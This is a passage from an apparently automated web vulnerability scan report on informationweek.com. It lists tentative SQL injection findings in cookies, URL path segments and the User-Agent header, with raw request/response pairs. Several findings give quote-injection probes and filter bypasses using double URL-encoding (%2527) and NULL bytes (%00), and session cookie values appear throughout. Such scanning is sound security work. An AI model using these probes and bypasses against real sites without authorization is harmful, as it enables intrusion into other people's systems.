Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 100431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t
...[SNIP]...
</strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong>
...[SNIP]...

Request 2

GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731%00''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:20:02 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:20:02 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.15. http://www.informationweek.com/events/ [s_lv cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /events/

Issue detail

The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529'; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:19:50 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:19:50 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 100431


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t
...[SNIP]...
</strong> you ensure increased productivity, eliminate errors, deliver the right resolution on the first attempt and most importantly add value to customers, prospects and your bottom line. <strong>
...[SNIP]...

Request 2

GET /events/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529''; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:19:51 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:19:51 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/events/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.16. http://www.informationweek.com/newsletters/DR_subscribe.jhtml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /newsletters/DR_subscribe.jhtml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /newsletters'/DR_subscribe.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 29746


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod">
...[SNIP]...

Request 2

GET /newsletters''/DR_subscribe.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:35 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:35 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/newsletters''/DR_subscribe.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.17. http://www.informationweek.com/video/security/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /video/security'/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30117


<!-- IsEmpty true -->
<!-- Check to see if this is an old story link (story/IWK20020101S001 for example) -->
<SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat
...[SNIP]...
<p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod">
...[SNIP]...

Request 2

GET /video/security''/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security''/&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.18. http://www.informationweek.com/video/security/ [iwkbtn_101201 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/

Issue detail

The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:32 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:32 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 69110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.19. http://www.informationweek.com/video/security/ [iwkbtn_emc_101111 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/

Issue detail

The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the iwkbtn_emc_101111 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%2527; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 69110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/ HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541%2527%2527; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:21:39 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:39 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/index.jhtml&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.20. http://www.informationweek.com/video/security/20979809001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/20979809001

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /video/security%2527/20979809001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:22:18 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:18 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 96430


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<span>There are lots of problems with using Spans ports, and usage is starting to decline, especially because they can introduce errors. Net Optics Director provides a better return on investement because it can isolate key traffic.</span>
...[SNIP]...

Request 2

GET /video/security%2527%2527/20979809001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sun, 12 Dec 2010 00:22:20 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:20 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security%2527%2527/20979809001&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.21. http://www.informationweek.com/video/security/21090964001 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/21090964001

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:41 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:41 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 67777


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 38477


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...

1.22. http://www.informationweek.com/video/security/21090964001 [ebNewBandWidth_.www.informationweek.com cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/21090964001

Issue detail

The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%00'; s_lv_s=More%20than%207%20days;

Response 1

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 68296


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span>
...[SNIP]...

Request 2

GET /video/security/21090964001 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%00''; s_lv_s=More%20than%207%20days;

Response 2

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:21:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:21:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 38475


<!--<DROPLET SRC="combinexy.jhtml">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh
...[SNIP]...

1.23. http://www.informationweek.com/video/security/21090964001 [s_lv cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.informationweek.com
Path:   /video/security/21090964001

Issue detail

The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

